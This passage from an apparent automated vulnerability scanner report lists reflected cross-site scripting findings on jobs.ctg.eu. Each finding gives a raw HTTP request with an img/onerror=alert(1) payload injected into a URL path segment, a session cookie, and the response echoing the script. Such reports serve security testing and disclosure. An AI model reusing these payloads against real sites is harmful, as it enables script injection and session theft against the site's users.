GET /sites/all/modulesa0fad"><img%20src%3da%20onerror%3dalert(1)>1d2bbd370ba/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesa0fad"><img src=a onerror=alert(1)>1d2bbd370ba-cck-modules-fieldgroup-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.54. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce390"><img%20src%3da%20onerror%3dalert(1)>3c08ceec826 was submitted in the REST URL parameter 4. This input was echoed as ce390"><img src=a onerror=alert(1)>3c08ceec826 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cckce390"><img%20src%3da%20onerror%3dalert(1)>3c08ceec826/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cckce390"><img src=a onerror=alert(1)>3c08ceec826-modules-fieldgroup-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.55. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e65d8"><img%20src%3da%20onerror%3dalert(1)>e9929ea8807 was submitted in the REST URL parameter 5. This input was echoed as e65d8"><img src=a onerror=alert(1)>e9929ea8807 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/modulese65d8"><img%20src%3da%20onerror%3dalert(1)>e9929ea8807/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-modulese65d8"><img src=a onerror=alert(1)>e9929ea8807-fieldgroup-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.56. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e73f"><img%20src%3da%20onerror%3dalert(1)>19a202725ce was submitted in the REST URL parameter 6. This input was echoed as 6e73f"><img src=a onerror=alert(1)>19a202725ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/modules/fieldgroup6e73f"><img%20src%3da%20onerror%3dalert(1)>19a202725ce/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-modules-fieldgroup6e73f"><img src=a onerror=alert(1)>19a202725ce-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.57. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff42a"><img%20src%3da%20onerror%3dalert(1)>4df1db9c331 was submitted in the REST URL parameter 7. This input was echoed as ff42a"><img src=a onerror=alert(1)>4df1db9c331 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/modules/fieldgroup/fieldgroup.cssff42a"><img%20src%3da%20onerror%3dalert(1)>4df1db9c331?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-modules-fieldgroup-fieldgroup.cssff42a"><img src=a onerror=alert(1)>4df1db9c331 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.58. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa69"><img%20src%3da%20onerror%3dalert(1)>d04d20f30bd was submitted in the REST URL parameter 1. This input was echoed as bfa69"><img src=a onerror=alert(1)>d04d20f30bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesbfa69"><img%20src%3da%20onerror%3dalert(1)>d04d20f30bd/all/modules/cck/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesbfa69"><img src=a onerror=alert(1)>d04d20f30bd-all-modules-cck-theme-content-module.css not-front not-logged-in page-sitesbfa69img-srca-onerroralert1d04d20f30bd no-sidebars">
...[SNIP]...

3.59. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbafa"><img%20src%3da%20onerror%3dalert(1)>d4cc4ccb574 was submitted in the REST URL parameter 2. This input was echoed as cbafa"><img src=a onerror=alert(1)>d4cc4ccb574 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allcbafa"><img%20src%3da%20onerror%3dalert(1)>d4cc4ccb574/modules/cck/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allcbafa"><img src=a onerror=alert(1)>d4cc4ccb574-modules-cck-theme-content-module.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.60. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a826d"><img%20src%3da%20onerror%3dalert(1)>07168fe7c99 was submitted in the REST URL parameter 3. This input was echoed as a826d"><img src=a onerror=alert(1)>07168fe7c99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesa826d"><img%20src%3da%20onerror%3dalert(1)>07168fe7c99/cck/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesa826d"><img src=a onerror=alert(1)>07168fe7c99-cck-theme-content-module.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.61. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0c8"><img%20src%3da%20onerror%3dalert(1)>cb88e4e60ce was submitted in the REST URL parameter 4. This input was echoed as bf0c8"><img src=a onerror=alert(1)>cb88e4e60ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cckbf0c8"><img%20src%3da%20onerror%3dalert(1)>cb88e4e60ce/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cckbf0c8"><img src=a onerror=alert(1)>cb88e4e60ce-theme-content-module.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.62. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc41"><img%20src%3da%20onerror%3dalert(1)>4a59448569d was submitted in the REST URL parameter 5. This input was echoed as 5fc41"><img src=a onerror=alert(1)>4a59448569d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/theme5fc41"><img%20src%3da%20onerror%3dalert(1)>4a59448569d/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-theme5fc41"><img src=a onerror=alert(1)>4a59448569d-content-module.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.63. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c74"><img%20src%3da%20onerror%3dalert(1)>ed85725023d was submitted in the REST URL parameter 6. This input was echoed as 64c74"><img src=a onerror=alert(1)>ed85725023d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/theme/content-module.css64c74"><img%20src%3da%20onerror%3dalert(1)>ed85725023d?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-theme-content-module.css64c74"><img src=a onerror=alert(1)>ed85725023d not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.64. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfd76"><img%20src%3da%20onerror%3dalert(1)>99b0fe2a1d7 was submitted in the REST URL parameter 1. This input was echoed as dfd76"><img src=a onerror=alert(1)>99b0fe2a1d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesdfd76"><img%20src%3da%20onerror%3dalert(1)>99b0fe2a1d7/all/modules/filefield/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesdfd76"><img src=a onerror=alert(1)>99b0fe2a1d7-all-modules-filefield-filefield.css not-front not-logged-in page-sitesdfd76img-srca-onerroralert199b0fe2a1d7 no-sidebars">
...[SNIP]...

3.65. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0d6"><img%20src%3da%20onerror%3dalert(1)>14b10f530b0 was submitted in the REST URL parameter 2. This input was echoed as 2a0d6"><img src=a onerror=alert(1)>14b10f530b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all2a0d6"><img%20src%3da%20onerror%3dalert(1)>14b10f530b0/modules/filefield/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all2a0d6"><img src=a onerror=alert(1)>14b10f530b0-modules-filefield-filefield.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.66. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa6eb"><img%20src%3da%20onerror%3dalert(1)>14bd3227d0a was submitted in the REST URL parameter 3. This input was echoed as fa6eb"><img src=a onerror=alert(1)>14bd3227d0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

